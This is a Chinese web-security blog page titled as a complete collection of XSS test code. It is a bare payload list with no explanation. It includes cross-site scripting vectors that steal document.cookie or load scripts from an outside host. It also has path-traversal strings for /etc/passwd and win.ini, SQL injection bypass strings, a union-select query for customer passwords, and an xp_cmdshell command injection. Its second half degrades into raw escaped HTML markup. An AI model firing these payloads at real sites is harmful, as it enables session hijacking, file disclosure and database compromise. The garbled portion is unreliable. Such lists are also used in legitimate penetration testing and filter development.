XSS跨站测试代码大全

  • A+
所属分类:WEB安全

XSS跨站测试代码大全

'><script>alert(document.cookie)</script>

='><script>alert(document.cookie)</script>

<script>alert(document.cookie)</script>

<script>alert(vulnerable)</script>

%3Cscript%3Ealert('XSS')%3C/script%3E

<script>alert('XSS')</script>

<img src="javascript:alert('XSS')">

%0a%0a<script>alert(\"Vulnerable\")</script>.jsp

%22%3cscript%3ealert(%22xss%22)%3c/script%3e

%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

%3f.jsp

%3f.jsp

<script>alert('Vulnerable');</script>

<script>alert('Vulnerable')</script>

?sql_debug=1

a%5c.aspx

a.jsp/<script>alert('Vulnerable')</script>

a/

a?<script>alert('Vulnerable')</script>

"><script>alert('Vulnerable')</script>

';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%3Cscript%3Ealert(document. domain);%3C/script%3E&

%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=

http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd

..\..\..\..\..\..\..\..\windows\system.ini

\..\..\..\..\..\..\..\..\windows\system.ini

'';!--"<XSS>=&{()}

<IMG src="javascript:alert('XSS');">

<IMG src=javascript:alert('XSS')>

<IMG src=JaVaScRiPt:alert('XSS')>

<IMG src=JaVaScRiPt:alert("XSS")>

<IMG src=javascript:alert('XSS')>

<IMG src=javascript:alert('XSS')>

<IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG src="jav ascript:alert('XSS');">

<IMG src="jav ascript:alert('XSS');">

<IMG src="jav ascript:alert('XSS');">

"<IMG src=java\0script:alert(\"XSS\")>";' > out

<IMG src=" javascript:alert('XSS');">

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<BGSOUND src="javascript:alert('XSS');">

<br size="&{alert('XSS')}">

<LAYER src="http://xss.ha.ckers.org/a.js"></layer>

<LINK REL="stylesheet" href="javascript:alert('XSS');">

<IMG src='vbscript:msgbox("XSS")'>

<IMG src="mocha:

&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;IMG src=&quot;livescript:[code]&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&#39;XSS&#39;);&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;IFRAME src=javascript:alert(&#39;XSS&#39;)&gt;&lt;/IFRAME&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;FRAMESET&gt;&lt;FRAME src=javascript:alert(&#39;XSS&#39;)&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;TABLE BACKGROUND=&quot;javascript:alert(&#39;XSS&#39;)&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&#39;XSS&#39;))&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;DIV STYLE=&quot;behaviour: url(&#39;http://www.how-to-hack.org/exploit.html&#39;);&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;DIV STYLE=&quot;width: expression(alert(&#39;XSS&#39;));&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;STYLE&gt;@im\port&#39;\ja\vasc\ript:alert(&quot;XSS&quot;)&#39;;&lt;/STYLE&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;IMG STYLE=&#39;xss:expre\ssion(alert(&quot;XSS&quot;))&#39;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&#39;XSS&#39;);&lt;/STYLE&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;STYLE TYPE=&quot;text/css&quot;&gt;.XSS{background-image:url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;A class=&quot;XSS&quot;&gt;&lt;/A&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&#39;XSS&#39;)&quot;)}&lt;/STYLE&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;BASE href=&quot;javascript:alert(&#39;XSS&#39;);//&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">getURL(&quot;javascript:alert(&#39;XSS&#39;)&quot;)</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">a=&quot;get&quot;;b=&quot;URL&quot;;c=&quot;javascript:&quot;;d=&quot;alert(&#39;XSS&#39;);&quot;;eval(a+b+c+d);</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;XML src=&quot;javascript:alert(&#39;XSS&#39;);&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot;&gt; &lt;BODY ONLOAD=&quot;a();&quot;&gt;&lt;SCRIPT&gt;function a(){alert(&#39;XSS&#39;);}&lt;/SCRIPT&gt;&lt;&quot;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;SCRIPT src=&quot;http://xss.ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;IMG src=&quot;javascript:alert(&#39;XSS&#39;)&quot;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;!--#exec cmd=&quot;/bin/echo &#39;&lt;SCRIPT SRC&#39;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &#39;=http://xss.ha.ckers.org/a.js&gt;&lt;/SCRIPT&gt;&#39;&quot;--&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;IMG src=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;SCRIPT a=&quot;&gt;&quot; src=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;SCRIPT =&quot;&gt;&quot; src=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;SCRIPT a=&quot;&gt;&quot; &#39;&#39; src=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;SCRIPT &quot;a=&#39;&gt;&#39;&quot; src=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT src=&quot;http://xss.ha.ckers.org/a.js&quot;&gt;&lt;/SCRIPT&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&lt;A href=http://www.gohttp://www.google.com/ogle.com/&gt;link&lt;/A&gt;</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">admin&#39;--</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39; or 0=0 --</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot; or 0=0 --</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">or 0=0 --</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39; or 0=0 #</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot; or 0=0 #</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">or 0=0 #</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39; or &#39;x&#39;=&#39;x</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot; or &quot;x&quot;=&quot;x</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39;) or (&#39;x&#39;=&#39;x</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39; or 1=1--</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot; or 1=1--</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">or 1=1--</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39; or a=a--</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot; or &quot;a&quot;=&quot;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&#39;) or (&#39;a&#39;=&#39;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">&quot;) or (&quot;a&quot;=&quot;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&quot; or &quot;a&quot;=&quot;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&quot; or 1=1 --</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&#39; or 1=1 --</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&#39; or &#39;a&#39;=&#39;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&#39;) or (&#39;a&#39;=&#39;a</span></p><p><span style="font-size: 14px; font-family: &#39;times new roman&#39;;">hi&quot;) or (&quot;a&quot;=&quot;a

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: